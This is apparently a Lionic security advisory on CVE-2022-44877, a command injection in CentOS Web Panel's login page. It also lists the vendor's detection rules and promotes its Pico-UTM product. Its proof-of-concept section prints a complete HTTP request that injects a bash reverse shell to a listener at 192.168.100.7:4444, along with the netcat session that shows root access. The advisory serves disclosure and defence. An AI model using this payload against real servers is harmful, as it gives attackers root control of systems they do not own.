Hsinchu, Taiwan – Feb 8, 2023 – CentOS Linux is widely used on servers, many of which are connected to the Internet. Some network administrators may use CWP, CentOS Web Panel, to manage their CentOS Linux installations. In December 2022, a serious vulnerability was found in CWP - CVE-2022-44877 - that allowed remote code execution. This made it highly likely that cybercriminals could exploit unpatched CentOS installations.
Proof of Concept
The CVE-2022-44877 vulnerability was located in the “/login/index.php?login” of CWP, which typically runs on ports 2030 or 2086 for HTTP and 2031 and 2087 for HTTPS. By sending a specially crafted HTTP request, an attacker could execute arbitrary commands on the affected system with root privileges.
Assumed the IP address of the example CentOS 7 server is 192.168.100.89. The following HTTP request demonstrates how the vulnerability in CWP can be exploited to make the CWP connect to a remote server at IP address 192.168.100.7 and TCP port 4444:
POST /login/index.php?login=$(bash -i >& /dev/tcp/192.168.100.7/4444 0>&1) HTTP/1.1
Host: 192.168.100.89:2031
Content-Length: 46
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close
username=root&password=idonotcare&commit=Login
On the remote server, the attacker can use a tool such as NetCat (nc) to listen on TCP port 4444 and receive the incoming connection from the vulnerable CWP system. Once the connection is established, the attacker can execute arbitrary commands with root privileges on the vulnerable CWP system.
# nc -lnvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.100.89.
Ncat: Connection from 192.168.100.89:51988.
bash: no job control in this shell
[root@localhost login]# whoami
whoami
root
[root@localhost login]#
According to the above, CWP on 192.168.100.89 server connected to NetCat on 192.168.100.7 successfully. The result of executing the “whoami” command confirms that the attacker has gained root access of 192.168.100.89 server.
CVE-2022-44877
This CVE-2022-44877 is considered critical due to its high severity level and can lead to serious security breaches.
| CVE Id | CVE Description | CVSS v3 Score | Severity Level | Affected Software |
|---|---|---|---|---|
| CVE-2022-44877 | login/index.php in CWP (aka Control Web Panel or CentOS Web Panel) allows remote attackers to execute arbitrary OS commands via shell metacharacters in the login parameter. | 9.8 | Critical | CentOS 7, CWP version before 0.9.8.1147 |
Lionic Actions
Lionic quickly responded to this CVE-2022-44877 by developing related anti-intrusion signatures.
| Rule ID | Description |
|---|---|
| 8102309 | Centos Web Panel 7 login Command Injection |
| 8102310 | Centos Web Panel 7 login Command Injection |
| … | … |
Conclusion
Updating the software to the latest version is always the best method for fixing vulnerabilities. However, Lionic offers the Pico-UTM equipped with the latest signature as the “Virtual Bug Fix” solution. By using solutions like the Lionic Pico-UTM, they can stay protected and take their time to patch the systems.
It is important for network administrators to take cybersecurity seriously and stay up-to-date on vulnerabilities in their systems. Those network administrators who want to protect their servers without having to worry about constantly fixing vulnerabilities can adopted Pico-UTM.
References:
- “CVE-2022-44877”, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44877
- “CVE-2022-44877”, https://nvd.nist.gov/vuln/detail/CVE-2022-44877
- “Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877”, https://github.com/numanturle/CVE-2022-44877
- “CVE-2022-44877”, https://attackerkb.com/topics/cvIPkChzTY/cve-2022-44877
About Lionic Corporation
Lionic Corporation is a worldwide provider of innovative Deep Packet Inspection solutions. The technologies of Lionic include the complete DPI-based software engine and related management software which offer the Security Solutions that addresses anti-virus, anti-intrusion, anti-webthreat; and the Content Management Solutions that addresses application identification, device identification, application based QoS, web content filtering, parental control.
Lionic’s security and content management solutions, cloud-based scan services and signature subscription service are widely deployed in the world already. They help service providers, network appliance manufacturers, semiconductor companies, etc. to enable the next generation of business routers, residential gateways, SD WAN edges and cloud gateways, advanced firewalls, UTMs, Smart NICs and mobile devices. Those products powered by Lionic provide better network management and protect the world’s networks from an ever increasing level of security threats.
